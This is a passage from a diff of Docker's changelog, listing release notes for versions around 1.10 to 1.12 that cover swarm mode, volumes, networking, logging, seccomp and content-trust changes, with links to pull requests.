[#20853](https://github.com/docker/docker/pull/20853) +- Fix an issue with `stats` when a container is using another container's network [#21904](https://github.com/docker/docker/pull/21904) + +### Swarm Mode + ++ New `swarm` command to manage swarms with `init`, `join`, `join-token`, `leave`, `update` subcommands [#23361](https://github.com/docker/docker/pull/23361) [#24823](https://github.com/docker/docker/pull/24823) ++ New `service` command to manage swarm-wide services with `create`, `inspect`, `update`, `rm`, `ps` subcommands [#23361](https://github.com/docker/docker/pull/23361) [#25140](https://github.com/docker/docker/pull/25140) ++ New `node` command to manage nodes with `accept`, `promote`, `demote`, `inspect`, `update`, `ps`, `ls` and `rm` subcommands [#23361](https://github.com/docker/docker/pull/23361) [#25140](https://github.com/docker/docker/pull/25140) ++ (experimental) New `stack` and `deploy` commands to manage and deploy multi-service applications [#23522](https://github.com/docker/docker/pull/23522) [#25140](https://github.com/docker/docker/pull/25140) + +### Volume + ++ Add support for local and global volume scopes (analogous to network scopes) [#22077](https://github.com/docker/docker/pull/22077) ++ Allow volume drivers to provide a `Status` field [#21006](https://github.com/docker/docker/pull/21006) ++ Add name/driver filter support for volume [#21361](https://github.com/docker/docker/pull/21361) +* Mount/Unmount operations now receives an opaque ID to allow volume drivers to differentiate between two callers [#21015](https://github.com/docker/docker/pull/21015) +- Fix issue preventing to remove a volume in a corner case [#22103](https://github.com/docker/docker/pull/22103) +- Windows: Enable auto-creation of host-path to match Linux [#22094](https://github.com/docker/docker/pull/22094) + + +### DEPRECATION +* Environment variables `DOCKER_CONTENT_TRUST_OFFLINE_PASSPHRASE` and `DOCKER_CONTENT_TRUST_TAGGING_PASSPHRASE` have been renamed + to `DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE` and `DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE` respectively [#22574](https://github.com/docker/docker/pull/22574) +* Remove deprecated `syslog-tag`, `gelf-tag`, `fluentd-tag` log option in favor of the more generic `tag` one [#22620](https://github.com/docker/docker/pull/22620) +* Remove deprecated feature of passing HostConfig at API container start [#22570](https://github.com/docker/docker/pull/22570) +* Remove deprecated `-f`/`--force` flag on docker tag [#23090](https://github.com/docker/docker/pull/23090) +* Remove deprecated `/containers//copy` endpoint [#22149](https://github.com/docker/docker/pull/22149) +* Remove deprecated `docker ps` flags `--since` and `--before` [#22138](https://github.com/docker/docker/pull/22138) +* Deprecate the old 3-args form of `docker import` [#23273](https://github.com/docker/docker/pull/23273) + +## 1.11.2 (2016-05-31) + +### Networking + +- Fix a stale endpoint issue on overlay networks during ungraceful restart ([#23015](https://github.com/docker/docker/pull/23015)) +- Fix an issue where the wrong port could be reported by `docker inspect/ps/port` ([#22997](https://github.com/docker/docker/pull/22997)) + +### Runtime + +- Fix a potential panic when running `docker build` ([#23032](https://github.com/docker/docker/pull/23032)) +- Fix interpretation of `--user` parameter ([#22998](https://github.com/docker/docker/pull/22998)) +- Fix a bug preventing container statistics to be correctly reported ([#22955](https://github.com/docker/docker/pull/22955)) +- Fix an issue preventing container to be restarted after daemon restart ([#22947](https://github.com/docker/docker/pull/22947)) +- Fix issues when running 32 bit binaries on Ubuntu 16.04 ([#22922](https://github.com/docker/docker/pull/22922)) +- Fix a possible deadlock on image deletion and container attach ([#22918](https://github.com/docker/docker/pull/22918)) +- Fix an issue where containers fail to start after a daemon restart if they depend on a containerized cluster store ([#22561](https://github.com/docker/docker/pull/22561)) +- Fix an issue causing `docker ps` to hang on CentOS when using devicemapper ([#22168](https://github.com/docker/docker/pull/22168), [#23067](https://github.com/docker/docker/pull/23067)) +- Fix a bug preventing to `docker exec` into a container when using devicemapper ([#22168](https://github.com/docker/docker/pull/22168), [#23067](https://github.com/docker/docker/pull/23067)) + + +## 1.11.1 (2016-04-26) + +### Distribution + +- Fix schema2 manifest media type to be of type `application/vnd.docker.container.image.v1+json` ([#21949](https://github.com/docker/docker/pull/21949)) + +### Documentation + ++ Add missing API documentation for changes introduced with 1.11.0 ([#22048](https://github.com/docker/docker/pull/22048)) + +### Builder + +* Append label passed to `docker build` as arguments as an implicit `LABEL` command at the end of the processed `Dockerfile` ([#22184](https://github.com/docker/docker/pull/22184)) + +### Networking + +- Fix a panic that would occur when forwarding DNS query ([#22261](https://github.com/docker/docker/pull/22261)) +- Fix an issue where OS threads could end up within an incorrect network namespace when using user defined networks ([#22261](https://github.com/docker/docker/pull/22261)) + +### Runtime + +- Fix a bug preventing labels configuration to be reloaded via the config file ([#22299](https://github.com/docker/docker/pull/22299)) +- Fix a regression where container mounting `/var/run` would prevent other containers from being removed ([#22256](https://github.com/docker/docker/pull/22256)) +- Fix an issue where it would be impossible to update both `memory-swap` and `memory` value together ([#22255](https://github.com/docker/docker/pull/22255)) +- Fix a regression from 1.11.0 where the `/auth` endpoint would not initialize `serveraddress` if it is not provided ([#22254](https://github.com/docker/docker/pull/22254)) +- Add missing cleanup of container temporary files when cancelling a schedule restart ([#22237](https://github.com/docker/docker/pull/22237)) +- Remove scary error message when no restart policy is specified ([#21993](https://github.com/docker/docker/pull/21993)) +- Fix a panic that would occur when the plugins were activated via the json spec ([#22191](https://github.com/docker/docker/pull/22191)) +- Fix restart backoff logic to correctly reset delay if container ran for at least 10secs ([#22125](https://github.com/docker/docker/pull/22125)) +- Remove error message when a container restart get cancelled ([#22123](https://github.com/docker/docker/pull/22123)) +- Fix an issue where `docker` would not correctly clean up after `docker exec` ([#22121](https://github.com/docker/docker/pull/22121)) +- Fix a panic that could occur when serving concurrent `docker stats` commands ([#22120](https://github.com/docker/docker/pull/22120))` +- Revert deprecation of non-existent host directories auto-creation ([#22065](https://github.com/docker/docker/pull/22065)) +- Hide misleading rpc error on daemon shutdown ([#22058](https://github.com/docker/docker/pull/22058)) + +## 1.11.0 (2016-04-13) + +**IMPORTANT**: With Docker 1.11, a Linux docker installation is now made of 4 binaries (`docker`, [`docker-containerd`](https://github.com/docker/containerd), [`docker-containerd-shim`](https://github.com/docker/containerd) and [`docker-runc`](https://github.com/opencontainers/runc)). If you have scripts relying on docker being a single static binaries, please make sure to update them. Interaction with the daemon stay the same otherwise, the usage of the other binaries should be transparent. A Windows docker installation remains a single binary, `docker.exe`. + +### Builder + +- Fix a bug where Docker would not use the correct uid/gid when processing the `WORKDIR` command ([#21033](https://github.com/docker/docker/pull/21033)) +- Fix a bug where copy operations with userns would not use the proper uid/gid ([#20782](https://github.com/docker/docker/pull/20782), [#21162](https://github.com/docker/docker/pull/21162)) + +### Client + +* Usage of the `:` separator for security option has been deprecated. `=` should be used instead ([#21232](https://github.com/docker/docker/pull/21232)) ++ The client user agent is now passed to the registry on `pull`, `build`, `push`, `login` and `search` operations ([#21306](https://github.com/docker/docker/pull/21306), [#21373](https://github.com/docker/docker/pull/21373)) +* Allow setting the Domainname and Hostname separately through the API ([#20200](https://github.com/docker/docker/pull/20200)) +* Docker info will now warn users if it can not detect the kernel version or the operating system ([#21128](https://github.com/docker/docker/pull/21128)) +- Fix an issue where `docker stats --no-stream` output could be all 0s ([#20803](https://github.com/docker/docker/pull/20803)) +- Fix a bug where some newly started container would not appear in a running `docker stats` command ([#20792](https://github.com/docker/docker/pull/20792)) +* Post processing is no longer enabled for linux-cgo terminals ([#20587](https://github.com/docker/docker/pull/20587)) +- Values to `--hostname` are now refused if they do not comply with [RFC1123](https://tools.ietf.org/html/rfc1123) ([#20566](https://github.com/docker/docker/pull/20566)) ++ Docker learned how to use a SOCKS proxy ([#20366](https://github.com/docker/docker/pull/20366), [#18373](https://github.com/docker/docker/pull/18373)) ++ Docker now supports external credential stores ([#20107](https://github.com/docker/docker/pull/20107)) +* `docker ps` now supports displaying the list of volumes mounted inside a container ([#20017](https://github.com/docker/docker/pull/20017)) +* `docker info` now also reports Docker's root directory location ([#19986](https://github.com/docker/docker/pull/19986)) +- Docker now prohibits login in with an empty username (spaces are trimmed) ([#19806](https://github.com/docker/docker/pull/19806)) +* Docker events attributes are now sorted by key ([#19761](https://github.com/docker/docker/pull/19761)) +* `docker ps` no longer shows exported port for stopped containers ([#19483](https://github.com/docker/docker/pull/19483)) +- Docker now cleans after itself if a save/export command fails ([#17849](https://github.com/docker/docker/pull/17849)) +* Docker load learned how to display a progress bar ([#17329](https://github.com/docker/docker/pull/17329), [#120078](https://github.com/docker/docker/pull/20078)) + +### Distribution + +- Fix a panic that occurred when pulling an image with 0 layers ([#21222](https://github.com/docker/docker/pull/21222)) +- Fix a panic that could occur on error while pushing to a registry with a misconfigured token service ([#21212](https://github.com/docker/docker/pull/21212)) ++ All first-level delegation roles are now signed when doing a trusted push ([#21046](https://github.com/docker/docker/pull/21046)) ++ OAuth support for registries was added ([#20970](https://github.com/docker/docker/pull/20970)) +* `docker login` now handles token using the implementation found in [docker/distribution](https://github.com/docker/distribution) ([#20832](https://github.com/docker/docker/pull/20832)) +* `docker login` will no longer prompt for an email ([#20565](https://github.com/docker/docker/pull/20565)) +* Docker will now fallback to registry V1 if no basic auth credentials are available ([#20241](https://github.com/docker/docker/pull/20241)) +* Docker will now try to resume layer download where it left off after a network error/timeout ([#19840](https://github.com/docker/docker/pull/19840)) +- Fix generated manifest mediaType when pushing cross-repository ([#19509](https://github.com/docker/docker/pull/19509)) +- Fix docker requesting additional push credentials when pulling an image if Content Trust is enabled ([#20382](https://github.com/docker/docker/pull/20382)) + +### Logging + +- Fix a race in the journald log driver ([#21311](https://github.com/docker/docker/pull/21311)) +* Docker syslog driver now uses the RFC-5424 format when emitting logs ([#20121](https://github.com/docker/docker/pull/20121)) +* Docker GELF log driver now allows to specify the compression algorithm and level via the `gelf-compression-type` and `gelf-compression-level` options ([#19831](https://github.com/docker/docker/pull/19831)) +* Docker daemon learned to output uncolorized logs via the `--raw-logs` options ([#19794](https://github.com/docker/docker/pull/19794)) ++ Docker, on Windows platform, now includes an ETW (Event Tracing in Windows) logging driver named `etwlogs` ([#19689](https://github.com/docker/docker/pull/19689)) +* Journald log driver learned how to handle tags ([#19564](https://github.com/docker/docker/pull/19564)) ++ The fluentd log driver learned the following options: `fluentd-address`, `fluentd-buffer-limit`, `fluentd-retry-wait`, `fluentd-max-retries` and `fluentd-async-connect` ([#19439](https://github.com/docker/docker/pull/19439)) ++ Docker learned to send log to Google Cloud via the new `gcplogs` logging driver. ([#18766](https://github.com/docker/docker/pull/18766)) + + +### Misc + ++ When saving linked images together with `docker save` a subsequent `docker load` will correctly restore their parent/child relationship ([#21385](https://github.com/docker/docker/pull/21385)) ++ Support for building the Docker cli for OpenBSD was added ([#21325](https://github.com/docker/docker/pull/21325)) ++ Labels can now be applied at network, volume and image creation ([#21270](https://github.com/docker/docker/pull/21270)) +* The `dockremap` is now created as a system user ([#21266](https://github.com/docker/docker/pull/21266)) +- Fix a few response body leaks ([#21258](https://github.com/docker/docker/pull/21258)) +- Docker, when run as a service with systemd, will now properly manage its processes cgroups ([#20633](https://github.com/docker/docker/pull/20633)) +* `docker info` now reports the value of cgroup KernelMemory or emits a warning if it is not supported ([#20863](https://github.com/docker/docker/pull/20863)) +* `docker info` now also reports the cgroup driver in use ([#20388](https://github.com/docker/docker/pull/20388)) +* Docker completion is now available on PowerShell ([#19894](https://github.com/docker/docker/pull/19894)) +* `dockerinit` is no more ([#19490](https://github.com/docker/docker/pull/19490),[#19851](https://github.com/docker/docker/pull/19851)) ++ Support for building Docker on arm64 was added ([#19013](https://github.com/docker/docker/pull/19013)) ++ Experimental support for building docker.exe in a native Windows Docker installation ([#18348](https://github.com/docker/docker/pull/18348)) + +### Networking + +- Fix panic if a node is forcibly removed from the cluster ([#21671](https://github.com/docker/docker/pull/21671)) +- Fix "error creating vxlan interface" when starting a container in a Swarm cluster ([#21671](https://github.com/docker/docker/pull/21671)) +* `docker network inspect` will now report all endpoints whether they have an active container or not ([#21160](https://github.com/docker/docker/pull/21160)) ++ Experimental support for the MacVlan and IPVlan network drivers has been added ([#21122](https://github.com/docker/docker/pull/21122)) +* Output of `docker network ls` is now sorted by network name ([#20383](https://github.com/docker/docker/pull/20383)) +- Fix a bug where Docker would allow a network to be created with the reserved `default` name ([#19431](https://github.com/docker/docker/pull/19431)) +* `docker network inspect` returns whether a network is internal or not ([#19357](https://github.com/docker/docker/pull/19357)) ++ Control IPv6 via explicit option when creating a network (`docker network create --ipv6`). This shows up as a new `EnableIPv6` field in `docker network inspect` ([#17513](https://github.com/docker/docker/pull/17513)) +* Support for AAAA Records (aka IPv6 Service Discovery) in embedded DNS Server ([#21396](https://github.com/docker/docker/pull/21396)) +- Fix to not forward docker domain IPv6 queries to external servers ([#21396](https://github.com/docker/docker/pull/21396)) +* Multiple A/AAAA records from embedded DNS Server for DNS Round robin ([#21019](https://github.com/docker/docker/pull/21019)) +- Fix endpoint count inconsistency after an ungraceful dameon restart ([#21261](https://github.com/docker/docker/pull/21261)) +- Move the ownership of exposed ports and port-mapping options from Endpoint to Sandbox ([#21019](https://github.com/docker/docker/pull/21019)) +- Fixed a bug which prevents docker reload when host is configured with ipv6.disable=1 ([#21019](https://github.com/docker/docker/pull/21019)) +- Added inbuilt nil IPAM driver ([#21019](https://github.com/docker/docker/pull/21019)) +- Fixed bug in iptables.Exists() logic [#21019](https://github.com/docker/docker/pull/21019) +- Fixed a Veth interface leak when using overlay network ([#21019](https://github.com/docker/docker/pull/21019)) +- Fixed a bug which prevents docker reload after a network delete during shutdown ([#20214](https://github.com/docker/docker/pull/20214)) +- Make sure iptables chains are recreated on firewalld reload ([#20419](https://github.com/docker/docker/pull/20419)) +- Allow to pass global datastore during config reload ([#20419](https://github.com/docker/docker/pull/20419)) +- For anonymous containers use the alias name for IP to name mapping, ie:DNS PTR record ([#21019](https://github.com/docker/docker/pull/21019)) +- Fix a panic when deleting an entry from /etc/hosts file ([#21019](https://github.com/docker/docker/pull/21019)) +- Source the forwarded DNS queries from the container net namespace ([#21019](https://github.com/docker/docker/pull/21019)) +- Fix to retain the network internal mode config for bridge networks on daemon reload ([#21780] (https://github.com/docker/docker/pull/21780)) +- Fix to retain IPAM driver option configs on daemon reload ([#21914] (https://github.com/docker/docker/pull/21914)) + +### Plugins + +- Fix a file descriptor leak that would occur every time plugins were enumerated ([#20686](https://github.com/docker/docker/pull/20686)) +- Fix an issue where Authz plugin would corrupt the payload body when faced with a large amount of data ([#20602](https://github.com/docker/docker/pull/20602)) + +### Runtime + +- Fix a panic that could occur when cleanup after a container started with invalid parameters ([#21716](https://github.com/docker/docker/pull/21716)) +- Fix a race with event timers stopping early ([#21692](https://github.com/docker/docker/pull/21692)) +- Fix race conditions in the layer store, potentially corrupting the map and crashing the process ([#21677](https://github.com/docker/docker/pull/21677)) +- Un-deprecate auto-creation of host directories for mounts. This feature was marked deprecated in ([#21666](https://github.com/docker/docker/pull/21666)) + Docker 1.9, but was decided to be too much of a backward-incompatible change, so it was decided to keep the feature. ++ It is now possible for containers to share the NET and IPC namespaces when `userns` is enabled ([#21383](https://github.com/docker/docker/pull/21383)) ++ `docker inspect ` will now expose the rootfs layers ([#21370](https://github.com/docker/docker/pull/21370)) ++ Docker Windows gained a minimal `top` implementation ([#21354](https://github.com/docker/docker/pull/21354)) +* Docker learned to report the faulty exe when a container cannot be started due to its condition ([#21345](https://github.com/docker/docker/pull/21345)) +* Docker with device mapper will now refuse to run if `udev sync` is not available ([#21097](https://github.com/docker/docker/pull/21097)) +- Fix a bug where Docker would not validate the config file upon configuration reload ([#21089](https://github.com/docker/docker/pull/21089)) +- Fix a hang that would happen on attach if initial start was to fail ([#21048](https://github.com/docker/docker/pull/21048)) +- Fix an issue where registry service options in the daemon configuration file were not properly taken into account ([#21045](https://github.com/docker/docker/pull/21045)) +- Fix a race between the exec and resize operations ([#21022](https://github.com/docker/docker/pull/21022)) +- Fix an issue where nanoseconds were not correctly taken in account when filtering Docker events ([#21013](https://github.com/docker/docker/pull/21013)) +- Fix the handling of Docker command when passed a 64 bytes id ([#21002](https://github.com/docker/docker/pull/21002)) +* Docker will now return a `204` (i.e http.StatusNoContent) code when it successfully deleted a network ([#20977](https://github.com/docker/docker/pull/20977)) +- Fix a bug where the daemon would wait indefinitely in case the process it was about to killed had already exited on its own ([#20967](https://github.com/docker/docker/pull/20967) +* The devmapper driver learned the `dm.min_free_space` option. If the mapped device free space reaches the passed value, new device creation will be prohibited. ([#20786](https://github.com/docker/docker/pull/20786)) ++ Docker can now prevent processes in container to gain new privileges via the `--security-opt=no-new-privileges` flag ([#20727](https://github.com/docker/docker/pull/20727)) +- Starting a container with the `--device` option will now correctly resolves symlinks ([#20684](https://github.com/docker/docker/pull/20684)) ++ Docker now relies on [`containerd`](https://github.com/docker/containerd) and [`runc`](https://github.com/opencontainers/runc) to spawn containers. ([#20662](https://github.com/docker/docker/pull/20662)) +- Fix docker configuration reloading to only alter value present in the given config file ([#20604](https://github.com/docker/docker/pull/20604)) ++ Docker now allows setting a container hostname via the `--hostname` flag when `--net=host` ([#20177](https://github.com/docker/docker/pull/20177)) ++ Docker now allows executing privileged container while running with `--userns-remap` if both `--privileged` and the new `--userns=host` flag are specified ([#20111](https://github.com/docker/docker/pull/20111)) +- Fix Docker not cleaning up correctly old containers upon restarting after a crash ([#19679](https://github.com/docker/docker/pull/19679)) +* Docker will now error out if it doesn't recognize a configuration key within the config file ([#19517](https://github.com/docker/docker/pull/19517)) +- Fix container loading, on daemon startup, when they depends on a plugin running within a container ([#19500](https://github.com/docker/docker/pull/19500)) +* `docker update` learned how to change a container restart policy ([#19116](https://github.com/docker/docker/pull/19116)) +* `docker inspect` now also returns a new `State` field containing the container state in a human readable way (i.e. one of `created`, `restarting`, `running`, `paused`, `exited` or `dead`)([#18966](https://github.com/docker/docker/pull/18966)) ++ Docker learned to limit the number of active pids (i.e. processes) within the container via the `pids-limit` flags. NOTE: This requires `CGROUP_PIDS=y` to be in the kernel configuration. ([#18697](https://github.com/docker/docker/pull/18697)) +- `docker load` now has a `--quiet` option to suppress the load output ([#20078](https://github.com/docker/docker/pull/20078)) +- Fix a bug in neighbor discovery for IPv6 peers ([#20842](https://github.com/docker/docker/pull/20842)) +- Fix a panic during cleanup if a container was started with invalid options ([#21802](https://github.com/docker/docker/pull/21802)) +- Fix a situation where a container cannot be stopped if the terminal is closed ([#21840](https://github.com/docker/docker/pull/21840)) + +### Security + +* Object with the `pcp_pmcd_t` selinux type were given management access to `/var/lib/docker(/.*)?` ([#21370](https://github.com/docker/docker/pull/21370)) +* `restart_syscall`, `copy_file_range`, `mlock2` joined the list of allowed calls in the default seccomp profile ([#21117](https://github.com/docker/docker/pull/21117), [#21262](https://github.com/docker/docker/pull/21262)) +* `send`, `recv` and `x32` were added to the list of allowed syscalls and arch in the default seccomp profile ([#19432](https://github.com/docker/docker/pull/19432)) +* Docker Content Trust now requests the server to perform snapshot signing ([#21046](https://github.com/docker/docker/pull/21046)) +* Support for using YubiKeys for Content Trust signing has been moved out of experimental ([#21591](https://github.com/docker/docker/pull/21591)) + +### Volumes + +* Output of `docker volume ls` is now sorted by volume name ([#20389](https://github.com/docker/docker/pull/20389)) +* Local volumes can now accept options similar to the unix `mount` tool ([#20262](https://github.com/docker/docker/pull/20262)) +- Fix an issue where one letter directory name could not be used as source for volumes ([#21106](https://github.com/docker/docker/pull/21106)) ++ `docker run -v` now accepts a new flag `nocopy`. This tells the runtime not to copy the container path content into the volume (which is the default behavior) ([#21223](https://github.com/docker/docker/pull/21223)) + +## 1.10.3 (2016-03-10) + +### Runtime + +- Fix Docker client exiting with an "Unrecognized input header" error [#20706](https://github.com/docker/docker/pull/20706) +- Fix Docker exiting if Exec is started with both `AttachStdin` and `Detach` [#20647](https://github.com/docker/docker/pull/20647) + +### Distribution + +- Fix a crash when pushing multiple images sharing the same layers to the same repository in parallel [#20831](https://github.com/docker/docker/pull/20831) +- Fix a panic when pushing images to a registry which uses a misconfigured token service [#21030](https://github.com/docker/docker/pull/21030) + +### Plugin system + +- Fix issue preventing volume plugins to start when SELinux is enabled [#20834](https://github.com/docker/docker/pull/20834) +- Prevent Docker from exiting if a volume plugin returns a null response for Get requests [#20682](https://github.com/docker/docker/pull/20682) +- Fix plugin system leaking file descriptors if a plugin has an error [#20680](https://github.com/docker/docker/pull/20680) + +### Security + +- Fix linux32 emulation to fail during docker build [#20672](https://github.com/docker/docker/pull/20672) + It was due to the `personality` syscall being blocked by the default seccomp profile. +- Fix Oracle XE 10g failing to start in a container [#20981](https://github.com/docker/docker/pull/20981) + It was due to the `ipc` syscall being blocked by the default seccomp profile. +- Fix user namespaces not working on Linux From Scratch [#20685](https://github.com/docker/docker/pull/20685) +- Fix issue preventing daemon to start if userns is enabled and the `subuid` or `subgid` files contain comments [#20725](https://github.com/docker/docker/pull/20725) + +## 1.10.2 (2016-02-22) + +### Runtime + +- Prevent systemd from deleting containers' cgroups when its configuration is reloaded [#20518](https://github.com/docker/docker/pull/20518) +- Fix SELinux issues by disregarding `--read-only` when mounting `/dev/mqueue` [#20333](https://github.com/docker/docker/pull/20333) +- Fix chown permissions used during `docker cp` when userns is used [#20446](https://github.com/docker/docker/pull/20446) +- Fix configuration loading issue with all booleans defaulting to `true` [#20471](https://github.com/docker/docker/pull/20471) +- Fix occasional panic with `docker logs -f` [#20522](https://github.com/docker/docker/pull/20522) + +### Distribution + +- Keep layer reference if deletion failed to avoid a badly inconsistent state [#20513](https://github.com/docker/docker/pull/20513) +- Handle gracefully a corner case when canceling migration [#20372](https://github.com/docker/docker/pull/20372) +- Fix docker import on compressed data [#20367](https://github.com/docker/docker/pull/20367) +- Fix tar-split files corruption during migration that later cause docker push and docker save to fail [#20458](https://github.com/docker/docker/pull/20458) + +### Networking + +- Fix daemon crash if embedded DNS is sent garbage [#20510](https://github.com/docker/docker/pull/20510) + +### Volumes + +- Fix issue with multiple volume references with same name [#20381](https://github.com/docker/docker/pull/20381) + +### Security + +- Fix potential cache corruption and delegation conflict issues [#20523](https://github.com/docker/docker/pull/20523) + +## 1.10.1 (2016-02-11) + +### Runtime + +* Do not stop daemon on migration hard failure [#20156](https://github.com/docker/docker/pull/20156) +- Fix various issues with migration to content-addressable images [#20058](https://github.com/docker/docker/pull/20058) +- Fix ZFS permission bug with user namespaces [#20045](https://github.com/docker/docker/pull/20045) +- Do not leak /dev/mqueue from the host to all containers, keep it container-specific [#19876](https://github.com/docker/docker/pull/19876) [#20133](https://github.com/docker/docker/pull/20133) +- Fix `docker ps --filter before=...` to not show stopped containers without providing `-a` flag [#20135](https://github.com/docker/docker/pull/20135) + +### Security + +- Fix issue preventing docker events to work properly with authorization plugin [#20002](https://github.com/docker/docker/pull/20002) + +### Distribution + +* Add additional verifications and prevent from uploading invalid data to registries [#20164](https://github.com/docker/docker/pull/20164) +- Fix regression preventing uppercase characters in image reference hostname [#20175](https://github.com/docker/docker/pull/20175) + +### Networking + +- Fix embedded DNS for user-defined networks in the presence of firewalld [#20060](https://github.com/docker/docker/pull/20060) +- Fix issue where removing a network during shutdown left Docker inoperable [#20181](https://github.com/docker/docker/issues/20181) [#20235](https://github.com/docker/docker/issues/20235) +- Embedded DNS is now able to return compressed results [#20181](https://github.com/docker/docker/issues/20181) +- Fix port-mapping issue with `userland-proxy=false` [#20181](https://github.com/docker/docker/issues/20181) + +### Logging + +- Fix bug where tcp+tls protocol would be rejected [#20109](https://github.com/docker/docker/pull/20109) + +### Volumes + +- Fix issue whereby older volume drivers would not receive volume options [#19983](https://github.com/docker/docker/pull/19983) + +### Misc + +- Remove TasksMax from Docker systemd service [#20167](https://github.com/docker/docker/pull/20167) + +## 1.10.0 (2016-02-04) + +**IMPORTANT**: Docker 1.10 uses a new content-addressable storage for images and layers. +A migration is performed the first time docker is run, and can take a significant amount of time depending on the number of images present. +Refer to this page on the wiki for more information: https://github.com/docker/docker/wiki/Engine-v1.10.0-content-addressability-migration +We also released a cool migration utility that enables you to perform the migration before updating to reduce downtime. +Engine 1.10 migrator can be found on Docker Hub: https://hub.docker.com/r/docker/v1.10-migrator/ + +### Runtime + ++ New `docker update` command that allows updating resource constraints on running containers [#15078](https://github.com/docker/docker/pull/15078) ++ Add `--tmpfs` flag to `docker run` to create a tmpfs mount in a container [#13587](https://github.com/docker/docker/pull/13587) ++ Add `--format` flag to `docker images` command [#17692](https://github.com/docker/docker/pull/17692) ++ Allow to set daemon configuration in a file and hot-reload it with the `SIGHUP` signal [#18587](https://github.com/docker/docker/pull/18587) ++ Updated docker events to include more meta-data and event types [#18888](https://github.com/docker/docker/pull/18888) + This change is backward compatible in the API, but not on the CLI. ++ Add `--blkio-weight-device` flag to `docker run` [#13959](https://github.com/docker/docker/pull/13959) ++ Add `--device-read-bps` and `--device-write-bps` flags to `docker run` [#14466](https://github.com/docker/docker/pull/14466) ++ Add `--device-read-iops` and `--device-write-iops` flags to `docker run` [#15879](https://github.com/docker/docker/pull/15879) ++ Add `--oom-score-adj` flag to `docker run` [#16277](https://github.com/docker/docker/pull/16277) ++ Add `--detach-keys` flag to `attach`, `run`, `start` and `exec` commands to override the default key sequence that detaches from a container [#15666](https://github.com/docker/docker/pull/15666) ++ Add `--shm-size` flag to `run`, `create` and `build` to set the size of `/dev/shm` [#16168](https://github.com/docker/docker/pull/16168) ++ Show the number of running, stopped, and paused containers in `docker info` [#19249](https://github.com/docker/docker/pull/19249) ++ Show the `OSType` and `Architecture` in `docker info` [#17478](https://github.com/docker/docker/pull/17478) ++ Add `--cgroup-parent` flag on `daemon` to set cgroup parent for all containers [#19062](https://github.com/docker/docker/pull/19062) ++ Add `-L` flag to docker cp to follow symlinks [#16613](https://github.com/docker/docker/pull/16613) ++ New `status=dead` filter for `docker ps` [#17908](https://github.com/docker/docker/pull/17908) +* Change `docker run` exit codes to distinguish between runtime and application errors [#14012](https://github.com/docker/docker/pull/14012) +* Enhance `docker events --since` and `--until` to support nanoseconds and timezones [#17495](https://github.com/docker/docker/pull/17495) +* Add `--all`/`-a` flag to `stats` to include both running and stopped containers [#16742](https://github.com/docker/docker/pull/16742) +* Change the default cgroup-driver to `cgroupfs` [#17704](https://github.com/docker/docker/pull/17704) +* Emit a "tag" event when tagging an image with `build -t` [#17115](https://github.com/docker/docker/pull/17115) +* Best effort for linked containers' start order when starting the daemon [#18208](https://github.com/docker/docker/pull/18208) +* Add ability to add multiple tags on `build` [#15780](https://github.com/docker/docker/pull/15780) +* Permit `OPTIONS` request against any url, thus fixing issue with CORS [#19569](https://github.com/docker/docker/pull/19569) +- Fix the `--quiet` flag on `docker build` to actually be quiet [#17428](https://github.com/docker/docker/pull/17428) +- Fix `docker images --filter dangling=false` to now show all non-dangling images [#19326](https://github.com/docker/docker/pull/19326) +- Fix race condition causing autorestart turning off on restart [#17629](https://github.com/docker/docker/pull/17629) +- Recognize GPFS filesystems [#19216](https://github.com/docker/docker/pull/19216) +- Fix obscure bug preventing to start containers [#19751](https://github.com/docker/docker/pull/19751) +- Forbid `exec` during container restart [#19722](https://github.com/docker/docker/pull/19722) +- devicemapper: Increasing `--storage-opt dm.basesize` will now increase the base device size on daemon restart [#19123](https://github.com/docker/docker/pull/19123) + +### Security + ++ Add `--userns-remap` flag to `daemon` to support user namespaces (previously in experimental) [#19187](https://github.com/docker/docker/pull/19187) ++ Add support for custom seccomp profiles in `--security-opt` [#17989](https://github.com/docker/docker/pull/17989) ++ Add default seccomp profile [#18780](https://github.com/docker/docker/pull/18780) ++ Add `--authorization-plugin` flag to `daemon` to customize ACLs [#15365](https://github.com/docker/docker/pull/15365) ++ Docker Content Trust now supports the ability to read and write user delegations [#18887](https://github.com/docker/docker/pull/18887) + This is an optional, opt-in feature that requires the explicit use of the Notary command-line utility in order to be enabled. + Enabling delegation support in a specific repository will break the ability of Docker 1.9 and 1.8 to pull from that repository, if content trust is enabled. +* Allow SELinux to run in a container when using the BTRFS storage driver [#16452](https://github.com/docker/docker/pull/16452) + +### Distribution + +* Use content-addressable storage for images and layers [#17924](https://github.com/docker/docker/pull/17924) + Note that a migration is performed the first time docker is run; it can take a significant amount of time depending on the number of images and containers present. + Images no longer depend on the parent chain but contain a list of layer references. + `docker load`/`docker save` tarballs now also contain content-addressable image configurations. + For more information: https://github.com/docker/docker/wiki/Engine-v1.10.0-content-addressability-migration +* Add support for the new [manifest format ("schema2")](https://github.com/docker/distribution/blob/master/docs/spec/manifest-v2-2.md) [#18785](https://github.com/docker/docker/pull/18785) +* Lots of improvements for push and pull: performance++, retries on failed downloads, cancelling on client disconnect [#18353](https://github.com/docker/docker/pull/18353), [#18418](https://github.com/docker/docker/pull/18418), [#19109](https://github.com/docker/docker/pull/19109), [#18353](https://github.com/docker/docker/pull/18353) +* Limit v1 protocol fallbacks [#18590](https://github.com/docker/docker/pull/18590) +- Fix issue where docker could hang indefinitely waiting for a nonexistent process to pull an image [#19743](https://github.com/docker/docker/pull/19743) + +### Networking + ++ Use DNS-based discovery instead of `/etc/hosts` [#19198](https://github.com/docker/docker/pull/19198) ++ Support for network-scoped alias using `--net-alias` on `run` and `--alias` on `network connect` [#19242](https://github.com/docker/docker/pull/19242) ++ Add `--ip` and `--ip6` on `run` and `network connect` to support custom IP addresses for a container in a network [#19001](https://github.com/docker/docker/pull/19001) ++ Add `--ipam-opt` to `network create` for passing custom IPAM options [#17316](https://github.com/docker/docker/pull/17316) ++ Add `--internal` flag to `network create` to restrict external access to and from the network [#19276](https://github.com/docker/docker/pull/19276) ++ Add `kv.path` option to `--cluster-store-opt` [#19167](https://github.com/docker/docker/pull/19167) ++ Add `discovery.heartbeat` and `discovery.ttl` options to `--cluster-store-opt` to configure discovery TTL and heartbeat timer [#18204](https://github.com/docker/docker/pull/18204) ++ Add `--format` flag to `network inspect` [#17481](https://github.com/docker/docker/pull/17481) ++ Add `--link` to `network connect` to provide a container-local alias [#19229](https://github.com/docker/docker/pull/19229) ++ Support for Capability exchange with remote IPAM plugins 